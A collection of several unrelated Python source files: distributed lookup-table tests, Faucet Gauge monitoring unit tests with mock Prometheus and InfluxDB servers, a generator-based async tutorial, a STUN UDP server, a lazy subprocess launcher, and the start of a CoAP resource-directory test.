emaps = ['127.0.0.1:' + str(port0), '127.0.0.1:' + str(port1)]
table_names = ['table', 'table']
height_sections = [10, 20]
# create and run sgd operator
lookup_table_op = Operator(
"lookup_table",
W='W',
Ids='Ids',
Out='Out',
remote_prefetch=True,
epmap=emaps,
table_names=table_names,
height_sections=height_sections)
lookup_table_op.run(scope, place)
# get and compare result
result_array = np.array(out)
self.assertEqual(out.lod(), ids_lod)
self.assertEqual(list(result_array.shape), [len(ids_array), 8])
for i in range(len(ids_array)):
id = ids_array[i][0]
self.assertTrue((result_array[i] == id).all())
def test_lookup_remote_table(self):
os.environ['PADDLE_ENABLE_REMOTE_PREFETCH'] = "1"
# run pserver on CPU in sync mode
p0 = self._start_pserver(0, False, True, run_pserver)
self._wait_ps_ready(p0.pid)
port0 = self._get_pserver_port(p0.pid)
p1 = self._start_pserver(1, False, True, run_pserver)
self._wait_ps_ready(p1.pid)
port1 = self._get_pserver_port(p1.pid)
places = [core.CPUPlace()]
if core.is_compiled_with_cuda():
places.append(core.CUDAPlace(0))
for place in places:
self._run_lookup_table_op_one_pserver(place, port0)
self._run_lookup_table_op_two_pserver(place, port0, port1)
# raise SIGTERM to pserver
os.kill(p0.pid, signal.SIGINT)
p0.join()
os.kill(p1.pid, signal.SIGINT)
p1.join()
if __name__ == '__main__':
unittest.main()
|
test_gauge.py
|
"""Unit tests for gauge"""
from collections import namedtuple
import random
import re
import shutil
import tempfile
import threading
import time
import os
import unittest
from unittest import mock
from http.server import HTTPServer, BaseHTTPRequestHandler
import yaml
import requests
from requests.exceptions import ConnectionError, ReadTimeout
from ryu.controller.ofp_event import EventOFPMsgBase
from ryu.lib import type_desc
from ryu.lib import hub
from ryu.ofproto import ofproto_v1_3 as ofproto
from ryu.ofproto import ofproto_v1_3_parser as parser
from prometheus_client import CollectorRegistry
from faucet import gauge, gauge_prom, gauge_influx, gauge_pollers, watcher
class QuietHandler(BaseHTTPRequestHandler):
"""Don't log requests."""
def log_message(self, _format, *_args):
pass
def table_by_id(i):
table = mock.Mock()
table_name = mock.PropertyMock(return_value='table' + str(i))
type(table).name = table_name
return table
def create_mock_datapath(num_ports):
"""Mock a datapath by creating mocked datapath ports."""
ports = {}
for i in range(1, num_ports + 1):
port = mock.Mock()
port_name = mock.PropertyMock(return_value='port' + str(i))
type(port).name = port_name
ports[i] = port
datapath = mock.Mock(ports=ports, dp_id=random.randint(1, 5000))
datapath.table_by_id = table_by_id
dp_name = mock.PropertyMock(return_value='datapath')
type(datapath).name = dp_name
return datapath
def start_server(handler):
""" Starts a HTTPServer and runs it as a daemon thread """
server = HTTPServer(('', 0), handler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
return server
def port_state_msg(datapath, port_num, reason, status=0):
""" Create an OFPPortStatus message with random values. """
port = parser.OFPPort(port_num,
'00:00:00:d0:00:0'+ str(port_num),
datapath.ports[port_num].name,
0,
status,
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(1, 10000)
)
return parser.OFPPortStatus(datapath, reason, port)
def port_stats_msg(datapath):
""" Create an OFPPortStatsReply with random values. """
stats = []
sec = random.randint(1, 10000)
nsec = random.randint(0, 10000)
for port_num in datapath.ports:
port_stats = parser.OFPPortStats(port_num,
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(0, 10000),
random.randint(0, 10000),
random.randint(0, 10000),
random.randint(0, 10000),
random.randint(0, 10000),
random.randint(0, 10000),
random.randint(0, 10000),
random.randint(0, 10000),
sec,
nsec
)
stats.append(port_stats)
return parser.OFPPortStatsReply(datapath, body=stats)
def flow_stats_msg(datapath, instructions):
""" Create an OFPFlowStatsReply with random values. """
matches = generate_all_matches()
flow_stats = parser.OFPFlowStats(random.randint(0, 9),
random.randint(1, 10000),
random.randint(0, 10000),
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(1, 10000),
0,
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(1, 10000),
matches,
instructions
)
return parser.OFPFlowStatsReply(datapath, body=[flow_stats])
def generate_all_matches():
"""
Generate all OpenFlow Extensible Matches (oxm) and return
a single OFPMatch with all of these oxms. The value for each
oxm is the largest value possible for the data type. For
example, the largest number for a 4 bit int is 15.
"""
matches = dict()
for oxm_type in ofproto.oxm_types:
if oxm_type.type == type_desc.MacAddr:
value = 'ff:ff:ff:ff:ff:ff'
elif oxm_type.type == type_desc.IPv4Addr:
value = '255.255.255.255'
elif oxm_type.type == type_desc.IPv6Addr:
value = 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff'
elif isinstance(oxm_type.type, type_desc.IntDescr):
value = 2**oxm_type.type.size - 1
else:
continue
matches[oxm_type.name] = value
return parser.OFPMatch(**matches)
def logger_to_ofp(port_stats):
""" Translates between the logger stat name and the OpenFlow stat name"""
return {'packets_out': port_stats.tx_packets,
'packets_in': port_stats.rx_packets,
'bytes_out' : port_stats.tx_bytes,
'bytes_in' : port_stats.rx_bytes,
'dropped_out' : port_stats.tx_dropped,
'dropped_in' : port_stats.rx_dropped,
'errors_in' : port_stats.rx_errors
}
def get_matches(match_dict):
"""Create a set of match name and value tuples"""
return {(entry['OXMTlv']['field'], entry['OXMTlv']['value']) for entry in match_dict}
def check_instructions(original_inst, logger_inst, test):
"""
Check that the original instructions matches the
instructions from the logger
"""
for inst_type, inst in logger_inst[0].items():
test.assertEqual(original_inst[0].__class__.__name__, inst_type)
for attr_name, attr_val in inst.items():
original_val = getattr(original_inst[0], attr_name)
test.assertEqual(original_val, attr_val)
def compare_flow_msg(flow_msg, flow_dict, test):
"""
Compare the body section of an OFPFlowStatsReply
message to a dict representation of it
"""
for stat_name, stat_val in flow_dict.items():
if stat_name == 'match':
match_set = get_matches(stat_val['OFPMatch']['oxm_fields'])
test.assertEqual(match_set, set(flow_msg.body[0].match.items()))
elif stat_name == 'instructions':
check_instructions(flow_msg.body[0].instructions, stat_val, test)
else:
test.assertEqual(getattr(flow_msg.body[0], stat_name), stat_val)
class PretendInflux(QuietHandler):
"""An HTTP Handler that receives InfluxDB messages."""
def do_POST(self): # pylint: disable=invalid-name
""" Write request contents to the HTTP server,
if there is an output file to write to. """
if hasattr(self.server, 'output_file'):
content_length = int(self.headers['content-length'])
data = self.rfile.read(content_length)
data = data.decode('utf-8')
with open(self.server.output_file, 'w') as log:
log.write(data)
self.send_response(204)
self.end_headers()
class GaugePrometheusTests(unittest.TestCase): # pytype: disable=module-attr
"""Tests the GaugePortStatsPrometheusPoller update method"""
prom_client = gauge_prom.GaugePrometheusClient(reg=CollectorRegistry())
def parse_prom_output(self, output):
"""Parses the port stats from prometheus into a dictionary"""
parsed_output = {}
for line in output.split('\n'):
# discard comments and stats not related to port stats
if line.startswith('#') or not line.startswith(gauge_prom.PROM_PORT_PREFIX):
continue
index = line.find('{')
#get the stat name e.g. of_port_rx_bytes and strip 'of_port_'
prefix = gauge_prom.PROM_PORT_PREFIX + gauge_prom.PROM_PREFIX_DELIM
stat_name = line[0:index].replace(prefix, '')
#get the labels within {}
labels = line[index + 1:line.find('}')].split(',')
for label in labels:
lab_name, lab_val = label.split('=')
lab_val = lab_val.replace('"', '')
if lab_name == 'dp_id':
dp_id = int(lab_val, 16)
elif lab_name == 'port_name':
port_name = lab_val
key = (dp_id, port_name)
stat_val = line.split(' ')[1]
if key not in parsed_output:
parsed_output[key] = []
parsed_output[key].append((stat_name, float(stat_val)))
return parsed_output
def get_prometheus_stats(self, addr, port):
"""Attempts to contact the prometheus server
at the address to grab port stats."""
url = 'http://{}:{}'.format(addr, port)
session = requests.Session()
adapter = requests.adapters.HTTPAdapter(max_retries=10)
session.mount('http://', adapter)
return session.get(url).text
def test_poller(self):
"""Test the update method to see if it pushes port stats"""
datapath = create_mock_datapath(2)
conf = mock.Mock(dp=datapath,
type='',
interval=1,
prometheus_port=9303,
prometheus_addr='localhost',
use_test_thread=True
)
prom_poller = gauge_prom.GaugePortStatsPrometheusPoller(conf, '__name__', self.prom_client)
msg = port_stats_msg(datapath)
prom_poller.update(time.time(), datapath.dp_id, msg)
prom_lines = self.get_prometheus_stats(conf.prometheus_addr, conf.prometheus_port)
prom_lines = self.parse_prom_output(prom_lines)
for port_num, port in datapath.ports.items():
port_stats = msg.body[int(port_num) - 1]
stats = prom_lines[(datapath.dp_id, port.name)]
stats_found = set()
for stat_name, stat_val in stats:
self.assertAlmostEqual(stat_val, getattr(port_stats, stat_name))
stats_found.add(stat_name)
self.assertEqual(stats_found, set(gauge_prom.PROM_PORT_VARS))
def test_port_state(self):
"""Test the update method to see if it pushes port state"""
datapath = create_mock_datapath(2)
conf = mock.Mock(dp=datapath,
type='',
interval=1,
prometheus_port=9303,
prometheus_addr='localhost',
use_test_thread=True
)
prom_poller = gauge_prom.GaugePortStatePrometheusPoller(conf, '__name__', self.prom_client)
reasons = [ofproto.OFPPR_ADD, ofproto.OFPPR_DELETE, ofproto.OFPPR_MODIFY]
for i in range(1, len(conf.dp.ports) + 1):
msg = port_state_msg(conf.dp, i, reasons[i-1])
port_name = conf.dp.ports[i].name
rcv_time = int(time.time())
prom_poller.update(rcv_time, conf.dp.dp_id, msg)
prom_lines = self.get_prometheus_stats(conf.prometheus_addr, conf.prometheus_port)
prom_lines = self.parse_prom_output(prom_lines)
stats = prom_lines[(datapath.dp_id, port_name)]
stats_found = set()
for stat_name, stat_val in stats:
msg_data = msg if stat_name == 'reason' else msg.desc
self.assertAlmostEqual(stat_val, getattr(msg_data, stat_name))
stats_found.add(stat_name)
self.assertEqual(stats_found, set(gauge_prom.PROM_PORT_STATE_VARS))
def test_flow_stats(self):
"""Check the update method of the GaugeFlowTablePrometheusPoller class"""
datapath = create_mock_datapath(2)
conf = mock.Mock(dp=datapath,
type='',
interval=1,
prometheus_port=9303,
prometheus_addr='localhost',
use_test_thread=True
)
prom_poller = gauge_prom.GaugeFlowTablePrometheusPoller(conf, '__name__', self.prom_client)
rcv_time = int(time.time())
instructions = [parser.OFPInstructionGotoTable(1)]
msg = flow_stats_msg(conf.dp, instructions)
prom_poller.update(rcv_time, conf.dp.dp_id, msg)
class GaugeInfluxShipperTest(unittest.TestCase): # pytype: disable=module-attr
"""Tests the InfluxShipper"""
def create_config_obj(self, port=12345):
"""Create a mock config object that contains the necessary InfluxDB config"""
conf = mock.Mock(influx_host='localhost',
influx_port=port,
influx_user='gauge',
influx_pwd='',
influx_db='gauge',
influx_timeout=10
)
return conf
def get_values(self, dict_to_unpack):
"""Get all the values from a nested dictionary"""
values = []
for value in dict_to_unpack.values():
if isinstance(value, dict):
values.extend(self.get_values(value))
else:
values.append(value)
return values
def test_ship_success(self):
"""Checks that the shipper successsfully connects
to a HTTP server when the points are shipped"""
try:
server = start_server(PretendInflux)
shipper = gauge_influx.InfluxShipper()
shipper.conf = self.create_config_obj(server.server_port)
points = [{'measurement': 'test_stat_name', 'fields' : {'value':1}},]
shipper.ship_points(points)
except (ConnectionError, ReadTimeout) as err:
self.fail("Code threw an exception: {}".format(err))
finally:
server.socket.close()
server.shutdown()
def test_ship_connection_err(self):
"""Checks that even when there is a connection error,
there is no exception thrown"""
try:
shipper = gauge_influx.InfluxShipper()
shipper.conf = self.create_config_obj()
shipper.logger = mock.Mock()
points = [{'measurement': 'test_stat_name', 'fields' : {'value':1}},]
shipper.ship_points(points)
except (ConnectionError, ReadTimeout) as err:
self.fail("Code threw an exception: {}".format(err))
def test_ship_no_config(self):
"""Check that no exceptions are thrown when
there is no config"""
try:
shipper = gauge_influx.InfluxShipper()
points = [{'measurement': 'test_stat_name', 'fields' : {'value':1}},]
shipper.ship_points(points)
except (ConnectionError, ReadTimeout) as err:
self.fail("Code threw an exception: {}".format(err))
def test_point(self):
"""Checks that the points produced still have the variables given to it"""
shipper = gauge_influx.InfluxShipper()
dp_name = 'faucet-1'
port_name = 'port1.0.1'
rcv_time = int(time.time())
stat_name = 'test_stat_name'
#max uint64 number
stat_val = 2**64 - 1
port_point = shipper.make_port_point(dp_name, port_name, rcv_time, stat_name, stat_val)
values = {dp_name, port_name, rcv_time, stat_name}
port_vals = set(self.get_values(port_point))
port_vals_stat = port_vals.difference(values)
self.assertEqual(len(port_vals_stat), 1)
self.assertAlmostEqual(port_vals_stat.pop(), stat_val)
tags = {'dp_name': dp_name, 'port_name': port_name}
point = shipper.make_point(tags, rcv_time, stat_name, stat_val)
point_vals = set(self.get_values(point))
point_vals_stat = point_vals.difference(values)
self.assertEqual(len(point_vals_stat), 1)
self.assertAlmostEqual(point_vals_stat.pop(), stat_val)
class GaugeInfluxUpdateTest(unittest.TestCase): # pytype: disable=module-attr
"""Test the Influx loggers update methods"""
server = None
def setUp(self):
""" Starts up an HTTP server to mock InfluxDB.
Also opens a new temp file for the server to write to """
self.server = start_server(PretendInflux)
self.temp_fd, self.server.output_file = tempfile.mkstemp()
def tearDown(self):
""" Close the temp file (which should delete it)
and stop the HTTP server """
os.close(self.temp_fd)
os.remove(self.server.output_file)
self.server.socket.close()
self.server.shutdown()
def create_config_obj(self, datapath):
"""Create a mock config object that contains the necessary InfluxDB config"""
conf = mock.Mock(influx_host='localhost',
influx_port=self.server.server_port,
influx_user='gauge',
influx_pwd='',
influx_db='gauge',
influx_timeout=10,
interval=5,
dp=datapath
)
return conf
@staticmethod
def parse_key_value(dictionary, kv_list):
"""
When given a list consisting of strings such as: 'key1=val1',
add to the dictionary as dictionary['key1'] = 'val1'.
Ignore entries in the list which do not contain '='
"""
for key_val in kv_list:
if '=' in key_val:
key, val = key_val.split('=')
try:
val = float(val)
val = int(val)
except ValueError:
pass
dictionary[key] = val
def parse_influx_output(self, output_to_parse):
"""
Parse the output from the mock InfluxDB server
The usual layout of the output is:
measurement,tag1=val1,tag2=val2 field1=val3 timestamp
The tags are separated with a comma and the fields
are separated with a space. The measurement always
appears first, and the timestamp is always last
"""
influx_data = dict()
tags = output_to_parse.split(',')
fields = tags[-1].split(' ')
tags[-1] = fields[0]
influx_data['timestamp'] = int(fields[-1])
fields = fields[1:-1]
self.parse_key_value(influx_data, tags)
self.parse_key_value(influx_data, fields)
return (tags[0], influx_data)
def test_port_state(self):
""" Check the update method of the GaugePortStateInfluxDBLogger class"""
conf = self.create_config_obj(create_mock_datapath(3))
db_logger = gauge_influx.GaugePortStateInfluxDBLogger(conf, '__name__', mock.Mock())
reasons = [ofproto.OFPPR_ADD, ofproto.OFPPR_DELETE, ofproto.OFPPR_MODIFY]
for i in range(1, len(conf.dp.ports) + 1):
msg = port_state_msg(conf.dp, i, reasons[i-1])
rcv_time = int(time.time())
db_logger.update(rcv_time, conf.dp.dp_id, msg)
with open(self.server.output_file, 'r') as log:
output = log.read()
influx_data = self.parse_influx_output(output)[1]
data = {conf.dp.name, conf.dp.ports[i].name, rcv_time, reasons[i-1]}
self.assertEqual(data, set(influx_data.values()))
def test_port_stats(self):
"""Check the update method of the GaugePortStatsInfluxDBLogger class"""
conf = self.create_config_obj(create_mock_datapath(2))
db_logger = gauge_influx.GaugePortStatsInfluxDBLogger(conf, '__name__', mock.Mock())
msg = port_stats_msg(conf.dp)
rcv_time = int(time.time())
db_logger.update(rcv_time, conf.dp.dp_id, msg)
with open(self.server.output_file, 'r') as log:
output = log.readlines()
for line in output:
measurement, influx_data = self.parse_influx_output(line)
# get the number at the end of the port_name
port_num = int(influx_data['port_name'][-1]) # pytype: disable=unsupported-operands
# get the original port stat value
port_stat_val = logger_to_ofp(
msg.body[port_num - 1])[measurement] # pytype: disable=unsupported-operands
self.assertEqual(port_stat_val, influx_data['value'])
self.assertEqual(conf.dp.name, influx_data['dp_name'])
self.assertEqual(rcv_time, influx_data['timestamp'])
def test_flow_stats(self):
"""Check the update method of the GaugeFlowTableInfluxDBLogger class"""
conf = self.create_config_obj(create_mock_datapath(0))
db_logger = gauge_influx.GaugeFlowTableInfluxDBLogger(conf, '__name__', mock.Mock())
rcv_time = int(time.time())
instructions = [parser.OFPInstructionGotoTable(1)]
msg = flow_stats_msg(conf.dp, instructions)
db_logger.update(rcv_time, conf.dp.dp_id, msg)
other_fields = {'dp_name': conf.dp.name,
'dp_id': hex(conf.dp.dp_id),
'timestamp': rcv_time,
'priority': msg.body[0].priority,
'table_id': msg.body[0].table_id,
'inst_count': len(msg.body[0].instructions),
'vlan': msg.body[0].match.get('vlan_vid') ^ ofproto.OFPVID_PRESENT,
'cookie': msg.body[0].cookie,
}
with open(self.server.output_file, 'r') as log:
output = log.readlines()
for line in output:
measurement, influx_data = self.parse_influx_output(line)
for stat_name, stat_val in influx_data.items():
if stat_name == 'value':
if measurement == 'flow_packet_count':
self.assertEqual(msg.body[0].packet_count, stat_val)
elif measurement == 'flow_byte_count':
self.assertEqual(msg.body[0].byte_count, stat_val)
else:
self.fail("Unknown measurement")
elif stat_name in other_fields:
self.assertEqual(other_fields[stat_name], stat_val)
elif stat_name in msg.body[0].match:
self.assertEqual(msg.body[0].match.get(stat_name), stat_val)
else:
self.fail("Unknown key: {} and value: {}".format(stat_name, stat_val))
class GaugeThreadPollerTest(unittest.TestCase): # pytype: disable=module-attr
"""Tests the methods in the GaugeThreadPoller class"""
def setUp(self):
"""Creates a gauge poller and initialises class variables"""
self.interval = 1
conf = mock.Mock(interval=self.interval)
self.poller = gauge_pollers.GaugeThreadPoller(conf, '__name__', mock.Mock())
self.send_called = False
def fake_send_req(self):
"""This should be called instead of the send_req method in the
GaugeThreadPoller class, which just throws an error"""
self.send_called = True
def fake_no_response(self):
"""This should be called instead of the no_response method in the
GaugeThreadPoller class, which just throws an error"""
pass
def test_start(self):
""" Checks if the poller is started """
self.poller.send_req = self.fake_send_req
self.poller.no_response = self.fake_no_response
self.poller.start(mock.Mock(), active=True)
poller_thread = self.poller.thread
hub.sleep(self.interval + 1)
self.assertTrue(self.send_called)
self.assertFalse(poller_thread.dead)
def test_stop(self):
""" Check if a poller can be stopped """
self.poller.send_req = self.fake_send_req
self.poller.no_response = self.fake_no_response
self.poller.start(mock.Mock(), active=True)
poller_thread = self.poller.thread
self.poller.stop()
hub.sleep(self.interval + 1)
self.assertFalse(self.send_called)
self.assertTrue(poller_thread.dead)
def test_active(self):
"""Check if active reflects the state of the poller """
self.assertFalse(self.poller.is_active())
self.assertFalse(self.poller.running())
self.poller.start(mock.Mock(), active=True)
self.assertTrue(self.poller.is_active())
self.assertTrue(self.poller.running())
self.poller.stop()
self.assertFalse(self.poller.is_active())
self.assertFalse(self.poller.running())
self.poller.start(mock.Mock(), active=False)
self.assertFalse(self.poller.is_active())
self.assertTrue(self.poller.running())
self.poller.stop()
self.assertFalse(self.poller.is_active())
self.assertFalse(self.poller.running())
class GaugePollerTest(unittest.TestCase): # pytype: disable=module-attr
"""Checks the send_req and no_response methods in a Gauge Poller"""
def check_send_req(self, poller, msg_class):
"""Check that the message being sent matches the expected one"""
datapath = mock.Mock(ofproto=ofproto, ofproto_parser=parser)
poller.start(datapath, active=True)
poller.stop()
poller.send_req()
for method_call in datapath.mock_calls:
arg = method_call[1][0]
self.assertTrue(isinstance(arg, msg_class))
def check_no_response(self, poller):
"""Check that no exception occurs when the no_response method is called"""
try:
poller.no_response()
except Exception as err:
self.fail("Code threw an exception: {}".format(err))
class GaugePortStatsPollerTest(GaugePollerTest):
"""Checks the GaugePortStatsPoller class"""
def test_send_req(self):
"""Check that the poller sends a port stats request"""
conf = mock.Mock(interval=1)
poller = gauge_pollers.GaugePortStatsPoller(conf, '__name__', mock.Mock())
self.check_send_req(poller, parser.OFPPortStatsRequest)
def test_no_response(self):
"""Check that the poller doesnt throw an exception"""
poller = gauge_pollers.GaugePortStatsPoller(mock.Mock(), '__name__', mock.Mock())
self.check_no_response(poller)
class GaugeFlowTablePollerTest(GaugePollerTest):
"""Checks the GaugeFlowTablePoller class"""
def test_send_req(self):
"""Check that the poller sends a flow stats request"""
conf = mock.Mock(interval=1)
poller = gauge_pollers.GaugeFlowTablePoller(conf, '__name__', mock.Mock())
self.check_send_req(poller, parser.OFPFlowStatsRequest)
def test_no_response(self):
"""Check that the poller doesnt throw an exception"""
poller = gauge_pollers.GaugeFlowTablePoller(mock.Mock(), '__name__', mock.Mock())
self.check_no_response(poller)
class GaugeWatcherTest(unittest.TestCase): # pytype: disable=module-attr
"""Checks the loggers in watcher.py."""
conf = None
temp_fd = None
temp_path = None
def setUp(self):
"""Creates a temporary file and a mocked conf object"""
self.temp_fd, self.temp_path = tempfile.mkstemp()
self.conf = mock.Mock(file=self.temp_path, compress=False)
def tearDown(self):
"""Closes and deletes the temporary file"""
os.close(self.temp_fd)
os.remove(self.temp_path)
def get_file_contents(self):
"""Return the contents of the temporary file and clear it"""
with open(self.temp_path, 'r+') as file_:
contents = file_.read()
file_.seek(0, 0)
file_.truncate()
return contents
def test_port_state(self):
"""Check the update method in the GaugePortStateLogger class"""
logger = watcher.GaugePortStateLogger(self.conf, '__name__', mock.Mock())
reasons = {'unknown' : 5,
'add' : ofproto.OFPPR_ADD,
'delete' : ofproto.OFPPR_DELETE,
'up' : ofproto.OFPPR_MODIFY,
'down' : ofproto.OFPPR_MODIFY
}
#add an ofproto attribute to the datapath
datapath = create_mock_datapath(1)
ofp_attr = {'ofproto': ofproto}
datapath.configure_mock(**ofp_attr)
for reason in reasons:
state = 0
if reason == 'down':
state = ofproto.OFPPS_LINK_DOWN
msg = port_state_msg(datapath, 1, reasons[reason], state)
logger.update(time.time(), datapath.dp_id, msg)
log_str = self.get_file_contents().lower()
self.assertTrue(reason in log_str)
self.assertTrue(msg.desc.name in log_str or 'port ' + str(msg.desc.port_no) in log_str)
hexs = re.findall(r'0x[0-9A-Fa-f]+', log_str)
hexs = [int(num, 16) for num in hexs]
self.assertTrue(datapath.dp_id in hexs or str(datapath.dp_id) in log_str)
def test_port_stats(self):
"""Check the update method in the GaugePortStatsLogger class"""
#add an ofproto attribute to the datapath
datapath = create_mock_datapath(2)
ofp_attr = {'ofproto': ofproto}
datapath.configure_mock(**ofp_attr)
#add the datapath as an attribute to the config
dp_attr = {'dp' : datapath}
self.conf.configure_mock(**dp_attr)
logger = watcher.GaugePortStatsLogger(self.conf, '__name__', mock.Mock())
msg = port_stats_msg(datapath)
original_stats = []
for i in range(0, len(msg.body)):
original_stats.append(logger_to_ofp(msg.body[i]))
logger.update(time.time(), datapath.dp_id, msg)
log_str = self.get_file_contents()
for stat_name in original_stats[0]:
stat_name = stat_name.split("_")
#grab any lines that mention the stat_name
pattern = r'^.*{}.{}.*$'.format(stat_name[0], stat_name[1])
stats_list = re.findall(pattern, log_str, re.MULTILINE)
for line in stats_list:
self.assertTrue(datapath.name in line)
#grab the port number (only works for single digit port nums)
index = line.find('port')
port_num = int(line[index + 4])
# grab the number at the end of the line
last_n = re.search(r'(\d+)$', line)
assert last_n
val = int(last_n.group())
logger_stat_name = '_'.join((stat_name[0], stat_name[1]))
original_val = original_stats[port_num - 1][logger_stat_name]
self.assertEqual(original_val, val)
def test_flow_stats(self):
"""Check the update method in the GaugeFlowStatsLogger class"""
#add an ofproto attribute to the datapath
datapath = create_mock_datapath(0)
ofp_attr = {'ofproto': ofproto}
datapath.configure_mock(**ofp_attr)
#add the datapath as an attribute to the config
dp_attr = {'dp' : datapath}
self.conf.configure_mock(**dp_attr)
logger = watcher.GaugeFlowTableLogger(self.conf, '__name__', mock.Mock())
instructions = [parser.OFPInstructionGotoTable(1)]
msg = flow_stats_msg(datapath, instructions)
logger.update(time.time(), datapath.dp_id, msg)
log_str = self.get_file_contents()
yaml_dict = yaml.load(log_str)['msg']['OFPFlowStatsReply']['body'][0]['OFPFlowStats']
compare_flow_msg(msg, yaml_dict, self)
class RyuAppSmokeTest(unittest.TestCase): # pytype: disable=module-attr
def setUp(self):
os.environ['GAUGE_LOG'] = '/dev/null'
os.environ['GAUGE_EXCEPTION_LOG'] = '/dev/null'
@staticmethod
def _fake_dp():
datapath = namedtuple('datapath', ['id', 'close'])(0, lambda: None)
return datapath
def _fake_event(self):
datapath = self._fake_dp()
msg = namedtuple('msg', ['datapath'])(datapath)
event = EventOFPMsgBase(msg=msg)
event.dp = msg.datapath
return event
def test_gauge(self):
"""Test Gauge can be initialized."""
os.environ['GAUGE_CONFIG'] = '/dev/null'
ryu_app = gauge.Gauge(
dpset={},
reg=CollectorRegistry())
ryu_app.reload_config(None)
self.assertFalse(ryu_app._config_files_changed())
ryu_app._update_watcher(None, self._fake_event())
ryu_app._start_watchers(self._fake_dp(), {}, time.time())
for event_handler in (
ryu_app._datapath_connect,
ryu_app._datapath_disconnect):
event_handler(self._fake_event())
def test_gauge_config(self):
"""Test Gauge minimal config."""
tmpdir = tempfile.mkdtemp()
os.environ['FAUCET_CONFIG'] = os.path.join(tmpdir, 'faucet.yaml')
os.environ['GAUGE_CONFIG'] = os.path.join(tmpdir, 'gauge.yaml')
with open(os.environ['FAUCET_CONFIG'], 'w') as faucet_config:
faucet_config.write(
"""
vlans:
100:
description: "100"
dps:
dp1:
dp_id: 0x1
interfaces:
1:
description: "1"
native_vlan: 100
""")
os.environ['GAUGE_CONFIG'] = os.path.join(tmpdir, 'gauge.yaml')
with open(os.environ['GAUGE_CONFIG'], 'w') as gauge_config:
gauge_config.write(
"""
faucet_configs:
- '%s'
watchers:
port_status_poller:
type: 'port_state'
all_dps: True
db: 'prometheus'
port_stats_poller:
type: 'port_stats'
all_dps: True
interval: 10
db: 'prometheus'
flow_table_poller:
type: 'flow_table'
all_dps: True
interval: 60
db: 'prometheus'
dbs:
prometheus:
type: 'prometheus'
prometheus_addr: '0.0.0.0'
prometheus_port: 0
""" % os.environ['FAUCET_CONFIG'])
ryu_app = gauge.Gauge(
dpset={},
reg=CollectorRegistry())
ryu_app.reload_config(None)
self.assertTrue(ryu_app.watchers)
ryu_app.reload_config(None)
self.assertTrue(ryu_app.watchers)
shutil.rmtree(tmpdir)
if __name__ == "__main__":
unittest.main() # pytype: disable=module-attr
|
20xiechengyibu.py
|
# -*- coding:utf-8 -*-
import time
import threading
# yield 关键字的作用挂起函数,并且将函数右面的返回
gen_model = None
def new_long_io():
# 接受一个函数作为参数
def func():
"""执行完线程的方法调用回调函数"""
global gen_model
print("开始耗时操作~~~~~~~~~~~~~")
time.sleep(5)
print("结束耗时操作~~~~~~~~~~~~~~")
result = "ok!!!!!"
# return result # 开始不再返回,现在return回去
try:
gen_model.send(result)
except StopIteration as e:
pass
# th = threading.Thread(target=func)
# 耗时操作交给别人去处理,这里暂时给一个线程
th = threading.Thread(target=func)
th.start()
# th.join() # join是等线程执行完毕后再继续执行,相当于同步ajax
def a():
print "进入了a"
# 使用yield 就不用回调了
ret = yield new_long_io()
print ret
print "离开了a"
def b():
print "进入了b"
time.sleep(3)
print "离开了b"
if __name__ == "__main__":
# 方法里用全局变量需要用global申明,如果是if语句则不需要global申明使用全局变量
gen_model = a() # a函数有yield所以是生成器,不能直接调用
next(gen_model)
b()
while True:
pass
|
server.py
|
#!/usr/bin/env python3
import logging
import socket
import threading
from rfc5389stunserver.constants import MsgClass, MethodType, AttrType
from rfc5389stunserver.parser import Parser
from rfc5389stunserver.stun_header import STUNHeader
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
def udp_thread(server: socket, address: tuple, data: bytes):
'''
メッセージを受信
最初の00やmagic cookieの値の正当性を確かめる
メッセージ長、メソッドとクラスの正当性
fingerprintを使ってる場合、その正しさ
エラーがある場合はただ捨てる
認証チェック
'''
# headerの中身をごにょごにょして残りの長さを求める
header, payload = data[0: 20], data[20:]
obj = Parser.parse(header, payload, address)
server.sendto(b''.join(map(lambda x: x.bin, obj)), address)
def create_udp_server(PORT: int):
server = socket.socket(socket.AF_INET | socket.AF_INET6,
socket.SOCK_DGRAM)
try:
server.bind((socket.gethostname(), PORT))
except socket.gaierror:
server.bind(('', PORT))
logger.info('UDP server: Start listening')
while True:
# Receive data from someone
(data, address) = server.recvfrom(16384) # 長さは適当
th = threading.Thread(
target=udp_thread, args=([server, address, data]))
th.start()
def create_udp_server_thread(PORT: int):
th = threading.Thread(target=create_udp_server, args=([PORT]))
th.start()
return th
|
lazy_process.py
|
import subprocess
import threading
import time
class LazyProcess:
"""Abstraction describing a command line launching a service - probably
as needed as functionality is accessed in Galaxy.
"""
def __init__(self, command_and_args):
self.command_and_args = command_and_args
self.thread_lock = threading.Lock()
self.allow_process_request = True
self.process = None
def start_process(self):
with self.thread_lock:
if self.allow_process_request:
self.allow_process_request = False
t = threading.Thread(target=self.__start)
t.daemon = True
t.start()
def __start(self):
with self.thread_lock:
self.process = subprocess.Popen(self.command_and_args, close_fds=True)
def shutdown(self):
with self.thread_lock:
self.allow_process_request = False
if self.running:
assert self.process # tell type checker it can not be None if self.running
self.process.terminate()
time.sleep(0.01)
if self.running:
self.process.kill()
@property
def running(self):
return self.process and not self.process.poll()
class NoOpLazyProcess:
"""LazyProcess abstraction meant to describe potentially optional
services, in those cases where one is not configured or valid, this
class can be used in place of LazyProcess.
"""
def start_process(self):
return
def shutdown(self):
return
@property
def running(self):
return False
|
resourcedirectory_test.py
|
import unittest
import threading
import socket
import re
import random
from time import sleep
from coapthon.resource_directory.resourceDirectory import ResourceDirectory
from coapthon.messages.response import Response
from coapthon.messages.request import Request
from coapthon import defines
from coapthon.serializer import Serializer
from pymongo import MongoClient
from coapthon.client.helperclient import HelperClient
__author__ = 'Carmelo Aparo'
class ResourceDirectoryTest(unittest.TestCase):
def setUp(self):
self.server_address = ("127.0.0.1", 5683)
self.current_mid = random.randint(1, 1000)
self.server = ResourceDirectory("127.0.0.1", 5683, start_mongo=False)
self.server_thread = threading.Thread(target=self.server.listen, args=(10,))
self.server_thread.start()
self.delete_database()
def tearDown(self):
self.server.close()
